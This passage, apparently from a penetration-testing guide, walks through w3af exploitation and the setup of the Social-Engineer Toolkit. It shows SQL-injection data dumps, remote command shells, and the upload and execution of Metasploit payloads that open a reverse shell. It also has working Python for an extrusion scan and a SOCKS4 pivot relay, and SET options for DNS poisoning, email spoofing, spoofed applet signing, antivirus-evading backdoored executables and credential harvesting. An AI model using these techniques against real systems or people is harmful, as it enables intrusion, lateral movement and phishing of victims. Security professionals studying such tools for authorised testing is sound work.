The second way is to use fastexploit. This method should be used when the user has found a vulnerability manually and wants to exploit it using the framework. Here is an example of a fastexploit run:

w3af>>> exploit
w3af/exploit>>> exploit config sqlmap
w3af/plugin/sqlmap>>> set url http://localhost/w3af/blindSqli/blindSqli-integer.php
w3af/plugin/sqlmap>>> set injvar id
w3af/plugin/sqlmap>>> set data id=1
w3af/plugin/sqlmap>>> back
w3af/exploit>>> fastexploit sqlmap
sqlmap coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>
SQL injection could be verified, trying to create the DB driver.
Execute "exitPlugin" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server.
w3af/exploit/sqlmap>>> dump agenda w3af_test
Database: w3af_test
Table: agenda
[2 entries]
+---------------+----+--------+----------+------------+
| direccion     | id | nombre | telefono | email      |
+---------------+----+--------+----------+------------+
| direccion 123 | 1  | apr    | 52365786 | acho@c.com |
| direccion 333 | 2  | vico   | 47998123 | vTro@c.com |
+---------------+----+--------+----------+------------+
w3af/exploit/sqlmap>>>

Advanced exploiting techniques

The framework implements two highly advanced exploiting techniques that allow the user to keep escalating privileges into the remote network. Both of these techniques are used once the framework is able to execute remote operating system commands; this is the case of (for example) the osCommanding, remoteFileIncludeShell and davShell attack plugins. These exploiting techniques are:

Virtual daemon, which allows you to use metasploit payloads to exploit the server that supports a vulnerable web application.

w3afAgent, which creates a tunnel between the compromised server and w3af, to allow the user to route TCP connections through the remote server.

Both of them are simple to use and configure using this guide. These features are under heavy development and are by no means stable; use them at your own risk.

Virtual daemon

As said before, this feature allows you to use metasploit payloads to exploit the server that supports a vulnerable web application. To use this feature you must have a working installation of the metasploit framework version 3.0 or greater; you can get it for free at www.metasploit.com. The installation and configuration of MSF is out of the scope of this document.

To be able to use the virtual daemon you will need to run the following command in order to copy the w3af metasploit module into the MSF directory:

./w3af_console -i /home/jdoe/tools/msf/

Where /home/jdoe/tools/msf/ is the directory where the user jdoe installed Metasploit. In case you are interested, this is just a fancy shortcut for cp core/controllers/vdaemon/w3af_vdaemon.rb /home/user/tools/msf/modules/exploits/unix/misc/. Once this has been done, the user can start using the virtual daemon feature. Before going through an example to see how to use the feature, we will make a summary of the steps that will happen during the exploitation:

1. w3af finds a vulnerability that allows remote command execution
2. The user exploits the vulnerability and starts the virtual daemon
3. The user starts the metasploit framework
4. The user configures the w3af module inside MSF and executes it
5. The w3af module inside MSF will connect to the virtual daemon that is listening on localhost
6. MSF will send the payload selected by the user to the virtual daemon
7. The virtual daemon will create a PE (portable executable) or an ELF (executable and linkable format) file depending on the remote operating system, and using the exploited vulnerability it will upload and execute the payload in the remote server
8. The process of uploading the file to the remote server depends on the remote operating system, the privileges of the user running w3af and the local operating system; but in most cases the following happens:
   - w3af sends a small executable to the remote server to perform an extrusion scan.
   - w3af sniffs on the configured interface ( misc-settings -> interface ) for packets that arrive on the expected ports in order to verify outgoing firewall rules on the remote network.
   - If a TCP port is found to be allowed in the remote firewall, w3af will try to run a server on that port and make a reverse connection from the compromised host in order to download the PE/ELF generated file. If no TCP ports are enabled, w3af will send the ELF/PE file to the remote server using several calls to the echo command, which is rather slow, but should always work because it's an in-band transfer method.
9. The payload runs in the remote server and possibly connects back to the metasploit framework, that will handle the rest of the exploitation.

Now that we know the theory, let's see an example of what this feature can do:
$ ./w3af_console
w3af>>> plugins
w3af>>> plugins
w3af/plugins>>> audit osCommanding
w3af/plugins>>> audit
Enabled audit plugins:
osCommanding
w3af/plugins>>> back
w3af>>> target
w3af/target>>> set target http://172.16.1.128/os.php?cmd=f00
w3af/target>>> back
w3af>>> start
The list of found URLs is:
http://
172.16.1.128/os.php
Found 1 URLs and 1 different points of injection.
The list of Fuzzable requests is:
http://
172.16.1.128/os.php | Method: GET | Parameters: (cmd)
Starting osCommanding plugin execution.
OS Commanding was found at: http://172.16.1.128/os.php . Using
method: GET. The data sent was: cmd=type+%25SYSTEMROOT
%25%5Cwin.ini The vulnerability was found in the request with id
7.
w3af>>> exploit
w3af/exploit>>> exploit osCommandingShell
osCommanding exploit plugin is starting.
The vulnerability was found using method GET, tried to change
the method to POST for exploiting but failed.
Vulnerability successfully exploited.
Execute "exitPlugin" to get out of the remote shell. Commands
typed in this menu will be runned on the remote web server.
w3af/exploit/osCommandingShell>>> start vdaemon
Virtual daemon service is running on port 9091, use metasploit's
w3af_vdaemon module to exploit it.
w3af/exploit/osCommandingShell>>>
Nothing special for now, we just added the new start vdaemon command. With
this w3af run we have covered items 1. and 2. of the theory. The next step is
to configure the MSF module and run it; my preferred way is to use Metasploit's
web interface msfweb. The first step is to click on the Exploit button on the
main menu; a small window will appear, there you should search for w3af and
then select the exploit named: w3af virtual daemon exploit. Some important
points to keep in mind while configuring the w3af agent virtual daemon module
inside MSF:
- The target is of course the remote operating system you are exploiting
- VNC payloads don't seem to work
- RHOST is the IP address of the server you are exploiting
- LHOST is your public IP address, i.e. the address the compromised server
can actually reach (check this when you are behind NAT)
- LPORT is a port the remote web server can connect to (when using
reverse connect payloads) or that you can connect to (when using bind
payloads)
- The w3af module inside Metasploit will connect to localhost:9091 and do
all the payload transfer; these parameters can't be configured and must not
be confused with RHOST/LHOST and LPORT
Once it has been configured, we can click on Launch Exploit to start the
process; this is what we will see in the w3af console:
w3af/exploit/osCommandingShell>>>
Please wait some seconds while w3af performs an extrusion scan.
The extrusion test failed, no reverse connect transfer methods
can be used. Trying inband echo transfer method.
Error: The user running w3af can't sniff on the specified
interface. Hints: Are you root? Does this interface exist?
Successfully transfered the MSF payload to the remote server.
Successfully executed the MSF payload on the remote server.
The last messages are printed when you run w3af as a normal user; the
reason is simple, when you run w3af as an unprivileged user you can't sniff
and therefore can't perform a successful extrusion scan, so w3af falls back
to the slow in-band echo transfer. A successful extrusion scan (w3af running
as root) would look like:
Please wait some seconds while w3af performs an extrusion scan.
ExtrusionServer listening on interface: eth1
Finished extrusion scan.
The remote host: "172.10.10.1" can connect to w3af with these
ports:
25/TCP
80/TCP
53/TCP
1433/TCP
8080/TCP
53/UDP
69/UDP
139/UDP
1025/UDP
The following ports are not bound to a local process and can be
used by w3af:
25/TCP
53/TCP
1433/TCP
8080/TCP
Selecting port "8080/TCP" for inbound connections from the
compromised server to w3af.
And if we take a look at the Metasploit web interface we will find something
far more interesting:
[*] Started reverse handler
[*] The remote IP address is: 172.16.1.128
[*] Using remote IP address to create payloads.
[*] Sent payload to vdaemon.
[*] The estimated time to wait for the extrusion scan to
complete is: 1 seconds.
[*] Done waiting!
[*] The estimated time to wait for PE/ELF transfer is: 8
seconds.
[*] Waiting...
[*] Done waiting!
[*] Going to wait for 27 seconds (waiting for crontab/at to
execute payload).
[*] The session could start before the handler, so please *be
patient*.
[*] Command shell session 1 opened (172.16.1.1:4444 > 172.16.1.128:1047)
[*] Done waiting!
[*] Starting handler
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Now the user has an interactive shell with the privileges of the user running
the web server, which can be used without any restrictions; you could even
close w3af now and continue working directly from the Metasploit shell.

w3afAgent
As said before, this feature allows you to create a reverse tunnel that will
route TCP connections through the compromised server. Unlike the virtual
daemon, this feature is ready to use and doesn't require any other software.
Before going through an example to see how to use this feature, we will make
a summary of the steps that happen during exploitation:
1. w3af finds a vulnerability that allows remote command execution
2. The user exploits the vulnerability and starts the w3afAgent
3. w3af performs an extrusion scan by sending a small executable to the
remote server. This executable connects back to w3af and allows the
framework to identify the outgoing firewall rules of the remote network.
4. The w3afAgent Manager sends a w3afAgentClient to the remote server. How
the file is uploaded to the remote server depends on the remote operating
system, the privileges of the user running w3af and the local operating
system; but in most cases the following happens:
- w3af reuses the information from the extrusion scan performed in step 3
in order to know which port it can use to listen for connections from
the compromised server.
- If a TCP port is found to be allowed by the remote firewall, w3af runs a
server on that port and makes the compromised host connect back to it to
download the generated PE/ELF file. If no TCP port is allowed, w3af sends
the ELF/PE file to the remote server using several calls to the echo
command, which is rather slow but should always work because it is an
in-band transfer method.
5. The w3afAgent Manager starts the w3afAgentServer, which binds on
localhost:1080 (the SOCKS port used by the w3af user) and on the interface
configured in w3af ( misc-settings->interface ) on the port discovered
during step 3.
6. The w3afAgentClient connects back to the w3afAgentServer, successfully
creating the tunnel
7. The user configures the proxy listening on localhost:1080 in his preferred
software
8. When the program connects to the SOCKS proxy, all outgoing connections
are routed through the compromised server
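The extrusion scan used in step 3 here (and in step 8 of the virtual daemon description above) is simple enough to reproduce. The following is an added example and not w3af's own code: it binds listeners on a list of candidate ports, lets a simulated "remote" probe connect back, and reports which ports are both reachable from the target and free locally, which is the "can connect to w3af with these ports" / "not bound to a local process" distinction w3af prints. Everything runs on loopback; the port numbers, the probe tag and the blocked-port set are assumptions made for the demo. A real scan on the well-known low ports needs root, which is exactly the "Are you root?" condition w3af reports when the scan fails.

```python
import socket
import threading

# Constructed demonstration of the extrusion-scan idea. The "remote" probe is
# a thread, and the "egress firewall" is a set of ports the probe may not use.
# Real scans listen on well-known ports (25, 53, 80, ...), which needs root.
PROBE_TAG = b"extrusion"


def bind_listeners(candidate_ports, host="127.0.0.1", timeout=2.0):
    """Bind a listening socket on every candidate port that is free locally.
    Ports already held by another local process are skipped, which is what
    w3af's "not bound to a local process" filter does."""
    listeners = {}
    for port in candidate_ports:
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.settimeout(timeout)
        try:
            srv.bind((host, port))
            srv.listen(5)
        except OSError:
            srv.close()
            continue
        listeners[port] = srv
    return listeners


def collect_callbacks(listeners):
    """Wait (at most the socket timeout) for one tagged connection on each
    listener and return the set of ports the remote side reached."""
    reachable = set()
    lock = threading.Lock()

    def wait_on(port, srv):
        try:
            conn, _ = srv.accept()
        except socket.timeout:
            return
        with conn:
            if conn.recv(64) == PROBE_TAG:
                with lock:
                    reachable.add(port)

    workers = [threading.Thread(target=wait_on, args=(p, s)) for p, s in listeners.items()]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    for srv in listeners.values():
        srv.close()
    return reachable


def remote_probe(host, ports, blocked):
    """Stand-in for the small executable w3af uploads to the compromised
    host: try to connect back on every port; 'blocked' simulates egress
    rules that silently drop the connection."""
    for port in ports:
        if port in blocked:
            continue
        try:
            with socket.create_connection((host, port), timeout=1.0) as c:
                c.sendall(PROBE_TAG)
        except OSError:
            pass


def extrusion_scan(candidate_ports, blocked_ports, host="127.0.0.1"):
    """Run the scan and return the sorted list of ports usable for the
    reverse connection (reachable from the target AND free on our side)."""
    listeners = bind_listeners(candidate_ports, host)
    probe = threading.Thread(target=remote_probe, args=(host, candidate_ports, blocked_ports))
    probe.start()
    reachable = collect_callbacks(listeners)
    probe.join()
    return sorted(reachable)


def pick_inbound_port(reachable_ports):
    """w3af's choice rule, simplified: the first usable port, or None, in
    which case only the in-band echo transfer remains."""
    return reachable_ports[0] if reachable_ports else None


def occupy_port(port, host="127.0.0.1"):
    """Hold a port the way an unrelated local service would, so the scan
    has to skip it. Returns the socket; close it to release the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, port))
    srv.listen(1)
    return srv


if __name__ == "__main__":
    held = occupy_port(47433)
    usable = extrusion_scan([47025, 47053, 47433, 48080], blocked_ports={47053})
    held.close()
    print("usable ports:", usable, "-> selecting", pick_inbound_port(usable))
```

In the demo run, 47053 is "blocked" by the simulated firewall and 47433 is occupied locally, so only 47025 and 48080 come back as usable and the first one is selected, mirroring the "Selecting port ... for inbound connections" line that w3af prints.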
Now that we know the theory, let's see an example of what this feature can
do:
$ ./w3af_console
w3af>>> plugins
w3af/plugins>>> audit osCommanding
w3af/plugins>>> audit
Enabled audit plugins:
osCommanding
w3af/plugins>>> back
w3af>>> target
w3af/target>>> set target http://172.10.10.1/w3af/v.php?c=list
w3af/target>>> back
w3af>>> start
The list of found URLs is:
http://172.10.10.1/w3af/v.php
Found 1 URLs and 1 different points of injection.
The list of Fuzzable requests is:
http://172.10.10.1/w3af/v.php | Method: GET | Parameters: (c)
Starting osCommanding plugin execution.
OS Commanding was found at: http://172.10.10.1/w3af/v.php .
Using method: GET. The data sent was: c=%2Fbin%2Fcat+%2Fetc%2Fpasswd
The vulnerability was found in the request with id 2.
w3af>>> exploit
w3af/exploit>>> exploit osCommandingShell
osCommanding exploit plugin is starting.
The vulnerability was found using method GET, tried to change
the method to POST for exploiting but failed.
Vulnerability successfully exploited.
Execute "exitPlugin" to get out of the remote shell. Commands
typed in this menu will be runned on the remote web server.
Nothing really new until now: we configured w3af, started the scan and
exploited the vulnerability.

w3af/exploit/osCommandingShell>>> start w3afAgent
Initializing w3afAgent system, please wait.
Please wait some seconds while w3af performs an extrusion scan.
The extrusion scan failed.
Error: The user running w3af can't sniff on the specified
interface. Hints: Are you root? Does this interface exist?
Using inbound port "5060" without knowing if the remote host
will be able to connect back.
The last messages are printed when you run w3af as a normal user; the
reason is simple, when you run w3af as an unprivileged user you can't sniff
and therefore can't perform a successful extrusion scan. Note that in this
case w3af picks an inbound port blindly, so if the remote firewall blocks it
the agent will never connect back. A successful extrusion scan would look like:
Please wait some seconds while w3af performs an extrusion scan.
ExtrusionServer listening on interface: eth1
Finished extrusion scan.
The remote host: "172.10.10.1" can connect to w3af with these
ports:
25/TCP
80/TCP
53/TCP
1433/TCP
8080/TCP
53/UDP
69/UDP
139/UDP
1025/UDP
The following ports are not bound to a local process and can be
used by w3af:
25/TCP
53/TCP
1433/TCP
8080/TCP
Selecting port "8080/TCP" for inbound connections from the
compromised server to w3af.
In both cases (superuser and normal user), these should be the next steps:
Starting w3afAgentClient upload.
Finished w3afAgentClient upload.
Please wait 30 seconds for w3afAgentClient execution.
w3afAgent service is up and running.
You may start using the w3afAgent that is listening on port
1080. All connections made through this SOCKS daemon will be
relayed using the compromised server.
And now, from another console, we can use a SOCKS client to route
connections through the compromised server. A direct connection to the
target's SSH port is refused, while the same connection made through the
SOCKS proxy on localhost:1080 reaches the service and gets its banner:
$ nc 172.10.10.1 22
(UNKNOWN) [172.10.10.1] 22 (ssh) : Connection refused
$ python socksClient.py 127.0.0.1 22
SSH-2.0-OpenSSH_4.3p2 Debian-8ubuntu1
Protocol mismatch.
$ cat socksClient.py
# Minimal SOCKS4 client using the SocksiPy module bundled with w3af
# (an installed PySocks works the same way with "import socks").
import sys
import extlib.socksipy.socks as socks

# Target host and port come from the command line; the connection is
# routed through the w3afAgent SOCKS proxy on localhost:1080 (SocksiPy's
# default port for SOCKS4). Note that the address is resolved on the
# compromised server, so 127.0.0.1 here is *its* loopback interface.
s = socks.socksocket()
s.setproxy(socks.PROXY_TYPE_SOCKS4, "localhost", 1080)
s.connect((sys.argv[1], int(sys.argv[2])))
s.send(b'\n')          # provoke the banner / "Protocol mismatch" reply
print(s.recv(1024))
s.close()
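To make the SOCKS side concrete, here is an added example (not part of w3af or of the original text) that implements both ends of the SOCKS4 CONNECT exchange that socksClient.py relies on: a small relay standing in for the w3afAgentServer on localhost:1080, a hand-built client that sends the 8-byte request plus USERID and checks the reply code, and a loopback echo service playing the host that is only reachable through the relay. The listening ports are chosen by the OS; the user id and payload are assumptions for the demo. Because the relay resolves and connects to the destination on its own side, this is the same reason why 127.0.0.1 in the socksClient.py run above meant the compromised server's loopback.

```python
import socket
import struct
import threading

# Constructed illustration of what sits behind localhost:1080: a SOCKS4 CONNECT
# relay, a hand-built SOCKS4 client and a loopback echo service as the "target".
SOCKS_VERSION, CMD_CONNECT = 4, 1
REPLY_GRANTED, REPLY_REJECTED = 0x5A, 0x5B


def build_connect_request(host, port, userid=b"w3af"):
    """SOCKS4 request: VN=4, CD=1, DSTPORT, DSTIP (IPv4 only), USERID, NUL."""
    return struct.pack("!BBH4s", SOCKS_VERSION, CMD_CONNECT, port,
                       socket.inet_aton(host)) + userid + b"\x00"


def parse_connect_request(head):
    """Decode the fixed 8-byte part; BIND (CD=2) is deliberately unsupported."""
    vn, cd, port, raw_ip = struct.unpack("!BBH4s", head)
    if vn != SOCKS_VERSION or cd != CMD_CONNECT:
        raise ValueError("not a SOCKS4 CONNECT request")
    return socket.inet_ntoa(raw_ip), port


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during handshake")
        buf += chunk
    return buf


def _pump(src, dst):
    """Copy bytes one way until EOF, then half-close the destination."""
    try:
        for chunk in iter(lambda: src.recv(4096), b""):
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle_client(client):
    """Relay side of one session: parse request, connect upstream, copy both ways."""
    try:
        host, port = parse_connect_request(_recv_exact(client, 8))
        while client.recv(1) not in (b"\x00", b""):   # skip USERID up to the NUL
            pass
        upstream = socket.create_connection((host, port), timeout=5)
    except (ValueError, OSError):
        client.sendall(struct.pack("!BBH4s", 0, REPLY_REJECTED, 0, b"\0\0\0\0"))
        client.close()
        return
    client.sendall(struct.pack("!BBH4s", 0, REPLY_GRANTED, 0, b"\0\0\0\0"))
    threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
    _pump(upstream, client)
    client.close()
    upstream.close()


def _serve(handler, host, port):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(16)

    def loop():  # accept loop in a daemon thread, one handler thread per client
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=handler, args=(conn,), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def start_socks4_server(host="127.0.0.1", port=0):
    """The relay, i.e. what w3afAgentServer exposes on localhost:1080."""
    return _serve(_handle_client, host, port)


def start_echo_server(host="127.0.0.1", port=0):
    """Stand-in for an internal service: echoes everything until EOF."""
    return _serve(lambda conn: (_pump(conn, conn), conn.close()), host, port)


def connect_via_socks(proxy_port, dst_host, dst_port, payload):
    """Client by hand: handshake, send payload, return the reply (None if rejected)."""
    with socket.create_connection(("127.0.0.1", proxy_port), timeout=5) as s:
        s.sendall(build_connect_request(dst_host, dst_port))
        if _recv_exact(s, 8)[1] != REPLY_GRANTED:
            return None
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        return b"".join(iter(lambda: s.recv(4096), b""))


if __name__ == "__main__":
    _, echo_port = start_echo_server()
    _, proxy_port = start_socks4_server()
    print(connect_via_socks(proxy_port, "127.0.0.1", echo_port, b"hello via SOCKS4"))
```

The reply byte 0x5A versus 0x5B is all a SOCKS4 client gets back: when the relay cannot reach the destination (in the demo, a closed port) it answers 0x5B and the client returns None, which is the behaviour you see as a refused or hung connection when the agent's host cannot reach the address you asked for.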

I think this has given you an overview of a framework which is as
handy as Burp Suite.
It should be mentioned that this section draws on the work of Mr. Andres
Riancho.

Chapter 4:Social Engineering Tools


The Social-Engineer Toolkit (SET) is specifically designed to
perform advanced attacks against the human element. SET was
designed to be released with the http://www.socialengineer.org launch and has
quickly become a standard tool in a penetration tester's arsenal. SET was
written by David Kennedy (ReL1K) and, with a lot of help from the community,
it has incorporated attacks never before seen in an exploitation toolset.
The attacks built into the toolkit are designed to be targeted and
focused attacks against a person or organization, used during a
penetration test.

Beginning with the Social Engineer Toolkit


The brains behind SET is its configuration file. SET by default works fine for most people;
however, advanced customization may be needed in order to ensure that the attack vectors
go off without a hitch. The first thing to do is ensure that you have updated SET, from its
directory:
root@bt:/pentest/exploits/SET# svn update
U    src/payloadgen/payloadgen.py
U    src/java_applet/Java.java
U    src/java_applet/jar_file.py
U    src/web_clone/cloner.py
U    src/msf_attacks/create_payload.py
U    src/harvester/scraper.py
U    src/html/clientside/gen_payload.py
U    src/html/web_server.py
U    src/arp_cache/arp_cache.py
U    set
U    readme/CHANGES
Updated to revision 319.
root@bt:/pentest/exploits/SET#

Once you've updated to the latest version, start tweaking your attack by editing the SET
configuration file. Let's walk through each of the flags:
root@bt:/pentest/exploits/set# nano config/set_config
# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/pentest/exploits/framework3

Looking through the configuration options, you can change specific fields to get a desired
result. In the first option, you can change the path to where Metasploit is located.
Metasploit is used for payload creation, file-format bugs, and for the browser exploit
sections.
# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap

The Ettercap section can be used when you're on the same subnet as the victims and you
want to perform DNS poisoning attacks against a subset of IP addresses. When this flag is set
to ON, it will poison the entire local subnet and redirect a specific site or all sites to your
malicious server.

# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF

Setting the SENDMAIL flag to ON will try starting sendmail, which can spoof source email
addresses. This attack only works if the victim's SMTP server does not perform reverse
lookups on the hostname. sendmail must be installed; if you're using BackTrack 4, it is
installed by default.

# SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
WEBATTACK_EMAIL=OFF

When setting WEBATTACK_EMAIL to ON, it will allow you to send mass emails to the
victims while utilizing the Web Attack vector. Traditionally the emailing aspect is only
available through the spear-phishing menu; however, when this is enabled it will add
additional functionality for you to be able to email victims with links to help your
attacks.
# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
# INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sunjava6-jdk
SELF_SIGNED_APPLET=OFF

The Java Applet attack vector is the attack with one of the highest rates of success that
SET has in its arsenal. To make the attack look more believable, you can turn this flag on,
which will allow you to sign the Java applet with whatever publisher name you want. Say you're
targeting CompanyX: the standard Java applet is signed as Microsoft; you can sign the
applet as CompanyX to make it look more believable. This requires you to install Java's
JDK (in Ubuntu it's apt-get install sun-java6-jdk or openjdk-6-jdk).
# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON

The AUTO_DETECT flag is probably one of the most asked questions in SET. In most
cases, SET will grab the interface you use in order to connect out to the Internet and use
that as the reverse connection and IP address. Most attacks need to be customized and
may not be on the internal network. If you turn this flag to OFF, SET will prompt you with
additional questions on setting up the attack. This flag should be used when you want to
use multiple interfaces, have an external IP, or you're in a NAT/port forwarding scenario.
# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK
# OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80.
WEB_PORT=80

By default the SET web server listens on port 80; if for some reason you need to change
this, you can specify an alternative port.
# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV
# DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE
# YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe
CUSTOM_EXE=src/exe/legit.binary

When using the payload encoding options of SET, the best option for anti-virus bypass is
the backdoored executable option, i.e. a legitimate exe with a malicious payload hidden
inside it. Specifically, an exe is backdoored with a Metasploit-based payload and can generally
evade most AVs out there. SET has an executable built into it for the backdooring
(legit.binary, which is just calc.exe); however, if for some reason you want to use a different
executable, you can specify the path to that exe with the CUSTOM_EXE flag.

# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www

The web server utilized within SET is a custom-coded Python web server that at times can be
somewhat slow depending on the load. If you find that you need a boost and want to utilize
Apache, you can flip this switch to ON and it will use Apache to handle the web requests
and speed your attack up. Note that this only works with the Java Applet and
Metasploit-based attacks. Because they rely on SET's own server to intercept the posted
credentials, Apache cannot be used with the web jacking, tabnabbing, or credential
harvester attack methods.
# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
#
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
#
SELF_SIGNED_CERT=OFF
#
# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem

In some cases, when you're performing an advanced social-engineering attack, you may want to
register a domain and buy an SSL certificate that makes the attack more believable. You can
incorporate SSL-based attacks with SET: you will need to turn WEBATTACK_SSL to
ON and point PEM_CLIENT/PEM_SERVER at the certificate files. If you want to use self-signed
certificates you can as well; however, there will be an untrusted-certificate warning when a
victim visits your website.
# TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW
# AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds
WEBJACKING_TIME=2000

The webjacking attack is performed by replacing the victim's browser window with another window
that is made to look like a legitimate site. This attack is very dependent on
timing: if you're doing it over the Internet, I recommend the delay to be 5000 (5 seconds);
otherwise, if you're internal, 2000 (2 seconds) is probably a safe bet.
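Since a mis-set flag here is the usual reason an attack vector "does not go off", the following added example (not SET's own code) parses a set_config file and checks the dependencies the walkthrough above describes: WEBATTACK_SSL=ON needs the PEM paths unless SELF_SIGNED_CERT is on, APACHE_SERVER=ON needs a webroot, WEB_PORT must be a valid port, the ON/OFF flags must really be ON or OFF, and WEBJACKING_TIME should be 5000 for Internet targets. SAMPLE_CONFIG is a constructed file whose key names match the ones shown above; the rules are my reading of the text, not SET's own validation.

```python
# Added example: parser and consistency check for SET's flat set_config format
# (KEY=VALUE, '#' comments). Rules encode only what the walkthrough states.
ON_OFF_FLAGS = ("SENDMAIL", "WEBATTACK_EMAIL", "SELF_SIGNED_APPLET", "AUTO_DETECT",
                "APACHE_SERVER", "WEBATTACK_SSL", "SELF_SIGNED_CERT")


def parse_set_config(text):
    """Return {KEY: VALUE}. Blank and '#' lines are ignored; a later key
    overrides an earlier one, as a sequential reader of the file would."""
    cfg = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if not sep or not key.strip():
            raise ValueError("line %d: expected KEY=VALUE, got %r" % (lineno, raw))
        cfg[key.strip()] = value.strip()
    return cfg


def lint_set_config(cfg, over_internet=False):
    """Flag settings that will make an attack vector fail or misbehave."""
    problems = []
    for flag in ON_OFF_FLAGS:
        if cfg.get(flag, "OFF").upper() not in ("ON", "OFF"):
            problems.append("%s must be ON or OFF, got %r" % (flag, cfg.get(flag)))
    if not cfg.get("METASPLOIT_PATH"):
        problems.append("METASPLOIT_PATH is empty: payload, file-format and browser attacks need Metasploit")
    port = cfg.get("WEB_PORT", "80")
    if not port.isdigit() or not 1 <= int(port) <= 65535:
        problems.append("WEB_PORT must be a TCP port number, got %r" % port)
    ssl_on = cfg.get("WEBATTACK_SSL", "OFF").upper() == "ON"
    self_signed = cfg.get("SELF_SIGNED_CERT", "OFF").upper() == "ON"
    if ssl_on and not self_signed:
        for key in ("PEM_CLIENT", "PEM_SERVER"):
            if not cfg.get(key):
                problems.append("WEBATTACK_SSL=ON needs %s (or SELF_SIGNED_CERT=ON)" % key)
    if cfg.get("APACHE_SERVER", "OFF").upper() == "ON" and not cfg.get("APACHE_DIRECTORY"):
        problems.append("APACHE_SERVER=ON needs APACHE_DIRECTORY (the webroot)")
    delay = cfg.get("WEBJACKING_TIME", "2000")
    if not delay.isdigit():
        problems.append("WEBJACKING_TIME must be milliseconds, got %r" % delay)
    elif over_internet and int(delay) < 5000:
        problems.append("WEBJACKING_TIME=%s is short for an Internet target; 5000 is recommended" % delay)
    return problems


# Constructed sample mirroring the keys walked through above; PEM_SERVER is
# left empty on purpose to show the SSL dependency check firing.
SAMPLE_CONFIG = """\
# constructed sample, not a real set_config
METASPLOIT_PATH=/pentest/exploits/framework3
ETTERCAP_INTERFACE=eth0
ETTERCAP_PATH=/usr/share/ettercap
SENDMAIL=OFF
WEBATTACK_EMAIL=OFF
SELF_SIGNED_APPLET=OFF
AUTO_DETECT=ON
WEB_PORT=80
CUSTOM_EXE=src/exe/legit.binary
APACHE_SERVER=OFF
APACHE_DIRECTORY=/var/www
WEBATTACK_SSL=ON
SELF_SIGNED_CERT=OFF
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=
WEBJACKING_TIME=2000
"""


def check_sample(over_internet=False):
    """Parse and lint the constructed sample; returns the list of findings."""
    return lint_set_config(parse_set_config(SAMPLE_CONFIG), over_internet)


if __name__ == "__main__":
    for problem in check_sample(over_internet=True):
        print("-", problem)
```

Run against the sample, the linter reports the missing PEM_SERVER and, when the target is reached over the Internet, the too-short webjacking delay; a clean config returns an empty list.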

SET's Menu
SET is a menu-driven attack system, which is fairly unique when it comes to hacker
tools. The decision not to make it command-line driven was made because of how social-engineering
attacks occur; they require multiple scenarios, options, and customizations. If the tool had
been command-line based it would have really limited the effectiveness of the attacks and
